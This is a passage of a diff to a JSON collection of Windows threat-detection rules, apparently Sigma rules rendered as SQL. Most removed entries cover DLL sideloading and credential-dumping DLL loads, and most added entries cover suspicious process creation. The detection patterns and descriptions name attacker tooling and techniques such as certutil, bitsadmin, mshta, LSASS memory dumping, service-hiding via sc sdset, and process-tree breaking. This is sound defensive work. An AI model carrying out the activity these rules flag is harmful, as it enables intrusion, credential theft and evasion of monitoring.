"proc_creation_win_winzip_password_compression.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "title": "WebDav Client Execution", + "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Rarely observed" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", - "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "status": "experimental", + "description": "Detects a suspicious svchost process start", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName = ''))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", - "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious aspnet_compiler.exe Execution", + "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "status": "test", + "description": "Execute C# code with the Build Provider and proper folder structure in place.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.003" + "attack.t1127" ], "falsepositives": [ - "Unikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", - "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "title": "Zip A Folder With PowerShell For Staging In Temp", + "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_powershell_zip_compress.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "title": "Suspicious RunAs-Like Flag Combination", + "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", + "title": "File or Folder Permissions Modifications", + "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "status": "test", + "description": "Detects a file or folder's permissions being modified or tampered with.", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1222.001" ], "falsepositives": [ - "Unknown" + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\cacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\icacls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE '%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_susp_file_permission_modifications.yml" }, { - "title": "VMGuestLib DLL Sideload", - "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", - "status": "experimental", - "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Explorer Process Tree Break", + "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "status": "test", + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ - "FP could occur if the legitimate version of vmGuestLib already exists on the system" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_vmguestlib.yml" + "filename": "proc_creation_win_explorer_break_process_tree.yml" }, { - "title": "Potential DLL Sideloading Using Coregen.exe", - "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "status": "experimental", - "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", - "author": "frack113", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1055" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Unknown" + "File located in the AppData folder with trusted signature" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "image_load_side_load_coregen.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "title": "Suspicious Execution of Shutdown to Log Out", + "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "description": "Detects the rare use of the command line tool shutdown to logoff a user", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.impact", + "attack.t1529" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_shutdown_logoff.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", - "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", + "id": "43103702-5886-11ed-9b6a-0242ac120002", + "status": "experimental", + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "author": "bohops", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "False positives depend on custom use of vsls-agent.exe" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.defense_evasion", 